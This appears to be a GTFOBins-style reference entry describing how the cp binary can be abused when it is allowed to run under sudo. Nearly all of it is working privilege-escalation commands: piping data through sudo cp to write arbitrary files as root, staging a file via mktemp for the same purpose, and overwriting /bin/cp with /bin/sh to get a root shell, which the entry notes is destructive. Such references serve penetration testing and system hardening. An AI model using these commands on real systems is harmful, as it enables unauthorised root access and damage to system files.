***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * LFILE=file_to_write
      echo "DATA" | sudo cp /dev/stdin "$LFILE"
    * This can be used to copy and then read or write files from a restricted
      file systems or with elevated privileges. (The GNU version of cp has the
      --parents option that can be used to also create the directory hierarchy
      specified in the source path, to the destination folder.)
      LFILE=file_to_write
      TF=$(mktemp)
      echo "DATA" > $TF
      sudo cp $TF $LFILE
    * This overrides cp itself with a shell (or any other executable) that is
      to be executed as root, useful in case a sudo rule allows to only run cp
      by path. Warning, this is a destructive action.
      sudo cp /bin/sh /bin/cp
      sudo cp
